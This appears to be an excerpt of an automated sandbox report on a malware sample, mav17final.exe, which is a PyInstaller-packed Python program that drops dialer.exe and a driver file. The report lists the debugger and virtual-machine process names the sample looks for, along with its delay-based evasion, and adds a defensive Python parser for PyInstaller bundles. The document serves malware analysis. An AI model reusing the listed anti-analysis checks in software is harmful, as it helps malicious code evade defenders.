      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\dwm.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Windows\System32\dwm.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: C:\Windows\System32\dwm.exe System information queried: FirmwareTableInformation
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "IDAG.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "IDAG.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "IMPORTREC.EXE",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "IDAQ.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: IDAQ.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WINDBG.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "WINDBG.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "X64DBG.EXE" 4
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2067450371.0000018718D1C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"03
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE"
      Source: mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMUSRVC.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "IDAQ.EXE"`G
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
      Source: dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"0
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDAG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: QEMU-GA.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXEP
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "IMPORTREC.EXE"P5
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "X64DBG.EXE",
      Source: mav17final.exe, 00000002.00000002.2062309954.00000187173C0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXESION
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IMPORTREC.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "XENSERVICE.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE"@2
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDAQ.EXE
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "OLLYDBG.EXE",
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "VMUSRVC.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXEP
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "FIDDLER.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D1C000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "PROCESSHACKER.EXE"ESS_LIST0O
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "WIRESHARK.EXE"
      Source: mav17final.exe, 00000002.00000003.1998679602.000001871972D000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2043930165.0000018718E2A000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2002994495.00000187194F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "QEMU-GA.EXE",
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: XENSERVICE.EXE
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "IDAQ.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "IDAG.EXE" H
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "IMPORTREC.EXE"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "X64DBG.EXE"
      Source: C:\Users\user\Desktop\mav17final.exe Code function: OpenSCManagerA,GetLastError,EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,CloseServiceHandle,CloseServiceHandle,2_2_00007FF8B9078620
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4376
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5421
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8013
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1553
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8016
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1633
      Source: C:\Windows\System32\dwm.exe Window / User API: threadDelayed 613
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd
      Source: C:\ProgramData\dialer.exe Dropped PE file which has not been started: C:\Windows\Temp\ujjtjyeszdwn.sys
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd
      Source: C:\Users\user\Desktop\mav17final.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd
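      The _MEI19682 directory and its contents (python311.dll, the *.pyd extension modules, psutil) are what a PyInstaller one-file bundle extracts at start-up, so mav17final.exe is a Python program packaged with PyInstaller rather than native code, and the interesting logic lives in the embedded scripts, not in the bootloader the report's code-function entries point at. The parser below is an added example, not code from the sample, from Joe Sandbox or from PyInstaller: it confirms that packaging straight from the executable by locating the CArchive cookie that PyInstaller appends after the bootloader and walking the table of contents, which is the first step before pulling out the bundled scripts for decompilation. The cookie layout (8-byte magic, package length, TOC offset and length, Python version, 64-byte library name, all big-endian) and the TOC entry layout are the PyInstaller bootloader format as read by tools such as pyinstxtractor; the bundle it parses is constructed in the block itself so it runs offline.

```python
"""Identify a PyInstaller-packed executable and list what it bundles.

Added example (not the sample's, Joe Sandbox's or PyInstaller's own code).
Layouts follow PyInstaller's bootloader: a cookie at the end of the CArchive
and a table of contents of variable-length entries, both big-endian.
"""
import struct
from typing import Optional

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
# magic, package length, TOC offset (relative to archive start), TOC length,
# Python version (e.g. 311 for 3.11), null-padded name of the Python DLL
COOKIE = struct.Struct("!8sIIii64s")          # 88 bytes, PyInstaller >= 2.1
# entry length, data offset (relative to archive start), compressed length,
# uncompressed length, compression flag, one-byte type code; name follows
TOC_ENTRY = struct.Struct("!iIIIBc")          # 18 bytes + name
TYPE_CODES = {b"s": "script", b"m": "module", b"M": "package", b"z": "PYZ archive",
              b"b": "binary", b"x": "data", b"o": "runtime option", b"d": "dependency"}


def parse_pyinstaller(data: bytes) -> Optional[dict]:
    """Return bundle metadata and its table of contents, or None if not PyInstaller."""
    # Search from the end: the bootloader itself contains the magic constant,
    # and signatures or appended data may follow the cookie.
    cookie_pos = data.rfind(PYINST_MAGIC)
    if cookie_pos < 0 or len(data) - cookie_pos < COOKIE.size:
        return None
    _magic, pkg_len, toc_off, toc_len, pyvers, libname = COOKIE.unpack_from(data, cookie_pos)
    # pkg_len covers everything from the start of the CArchive to the end of the cookie
    archive_start = cookie_pos + COOKIE.size - pkg_len
    if archive_start < 0 or toc_off + toc_len > pkg_len:
        return None                            # cookie fields do not fit the file
    entries = []
    pos = archive_start + toc_off
    end = pos + toc_len
    while pos + TOC_ENTRY.size <= end:
        entry_len, data_off, _clen, raw_len, compressed, typ = TOC_ENTRY.unpack_from(data, pos)
        if entry_len < TOC_ENTRY.size or pos + entry_len > end:
            break                              # corrupt TOC, stop rather than read out of bounds
        name = data[pos + TOC_ENTRY.size:pos + entry_len].rstrip(b"\x00").decode("utf-8", "replace")
        entries.append({"name": name, "type": TYPE_CODES.get(typ, typ.decode("latin-1")),
                        "offset": archive_start + data_off, "size": raw_len,
                        "compressed": bool(compressed)})
        pos += entry_len
    # Modern builds store major*100+minor (311), very old ones major*10+minor (27)
    major, minor = divmod(pyvers, 100) if pyvers >= 100 else divmod(pyvers, 10)
    return {"python": f"{major}.{minor}",
            "pylib": libname.rstrip(b"\x00").decode("ascii", "replace"),
            "archive_start": archive_start, "entries": entries}


def build_sample_bundle() -> bytes:
    """Constructed stand-in for a PyInstaller-packed EXE (not the real sample)."""
    stub = b"MZ" + b"\x00" * 62 + b"<fake bootloader>"      # pretend PE
    items = [("main", b"s", b"\x00fake-marshalled-script"),
             ("python311.dll", b"b", b"MZ<fake dll>")]
    payload, toc = b"", b""
    for name, typ, blob in items:
        encoded = name.encode() + b"\x00"
        encoded += b"\x00" * (-len(encoded) % 16)          # names are padded to 16-byte multiples
        entry_len = TOC_ENTRY.size + len(encoded)
        toc += TOC_ENTRY.pack(entry_len, len(payload), len(blob), len(blob), 0, typ) + encoded
        payload += blob
    toc_off = len(payload)
    pkg_len = len(payload) + len(toc) + COOKIE.size
    cookie = COOKIE.pack(PYINST_MAGIC, pkg_len, toc_off, len(toc), 311, b"python311.dll")
    return stub + payload + toc + cookie


if __name__ == "__main__":
    info = parse_pyinstaller(build_sample_bundle())
    print(f"PyInstaller bundle, Python {info['python']} ({info['pylib']})")
    for e in info["entries"]:
        print(f"  {e['type']:<12} {e['name']}  {e['size']} bytes at {e['offset']:#x}")
```

      On a real file, read it in binary mode and pass the bytes; entries of type "script" are the marshalled top-level scripts and the "PYZ archive" entry holds the pure-Python modules, and both need an interpreter of the matching minor version (3.11 here, as python311.dll in the dropped-file list also indicates) to decompile cleanly.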
      Source: C:\Users\user\Desktop\mav17final.exe Check user administrative privileges: GetTokenInformation, graph_0-15173
      Source: C:\Users\user\Desktop\mav17final.exe API coverage: 1.9 %
      Source: C:\Windows\System32\conhost.exe API coverage: 0.9 %
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824 Thread sleep count: 4376 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2824 Thread sleep count: 5421 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5676 Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep count: 8013 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4092 Thread sleep count: 1553 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3748 Thread sleep time: -4611686018427385s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1520 Thread sleep count: 8016 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320 Thread sleep count: 1633 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5952 Thread sleep time: -5534023222112862s >= -30000s
      Source: C:\Windows\System32\dwm.exe TID: 7092 Thread sleep count: 613 > 30
      Source: C:\Windows\System32\dwm.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA487C0 FindFirstFileExW,FindClose,0_2_00007FF79EA487C0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA53A64 _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 0_2_00007FF79EA5D354 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,0_2_00007FF79EA5D354
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9075AC0 SetErrorMode,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,GetVolumeInformationA,SetLastError,FindFirstVolumeMountPointA,FindNextVolumeMountPointA,FindVolumeMountPointClose,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,2_2_00007FF8B9075AC0
      Source: C:\Users\user\Desktop\mav17final.exe Code function: 2_2_00007FF8B9074610 RtlGetVersion,GetSystemInfo,InitializeCriticalSection,2_2_00007FF8B9074610
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.2042899107.000001871B017000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000009.00000002.2080504239.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000000.2044022692.00007FF7C9B1C000.00000002.00000001.01000000.0000000D.sdmp, dialer.exe, 00000009.00000003.2079395803.000001C5D4620000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: vboxtray.exe
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwareuser.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exep
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: "vmwaretray.exe"
      Source: mav17final.exe, 00000002.00000002.2067450371.0000018718D68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: qemu-ga.exe0
